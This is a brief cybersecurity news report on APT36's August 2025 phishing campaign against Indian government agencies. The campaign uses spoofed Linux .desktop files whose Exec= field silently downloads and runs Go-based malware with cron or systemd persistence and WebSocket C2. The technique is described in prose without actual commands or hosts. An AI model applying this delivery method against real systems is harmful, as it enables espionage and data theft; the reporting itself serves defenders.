307/68 Tuesday, August 26, 2025
The Pakistan-based hacker group APT36 has adopted a new tactic targeting Indian government and security agencies by abusing .desktop files on Linux systems. Normally used as simple shortcut launchers for applications, these files are now being leveraged to hide malware, enabling data theft and persistent access. According to cybersecurity firms CYFIRMA and CloudSEK, the campaign began on August 1, 2025, and remains active.
The attack begins with a phishing email containing a malicious ZIP file. Inside is a spoofed .desktop file, disguised to appear like a legitimate PDF document. When the victim opens the file, it triggers a hidden Bash command embedded in the Exec= field. This command downloads the malware payload from the attacker’s server or from Google Drive, modifies the file permissions to make it executable, and runs it silently in the background. Simultaneously, a decoy PDF opens in Firefox to avoid raising suspicion.
The malware itself is an ELF binary written in Go, designed to evade detection, maintain persistence via cron jobs or systemd, and communicate with a Command-and-Control (C2) server over two-way WebSocket connections.
Researchers noted the similarity to Windows-based LNK file attacks, where shortcut files are used to deliver malware. However, this Linux-specific tactic is particularly concerning because .desktop files are typically treated as harmless text files rather than executables. As a result, many security tools overlook them, making this a novel and stealthy attack vector. The evolution of APT36’s methods highlights their growing sophistication, aiming to evade detection and enhance espionage capabilities.
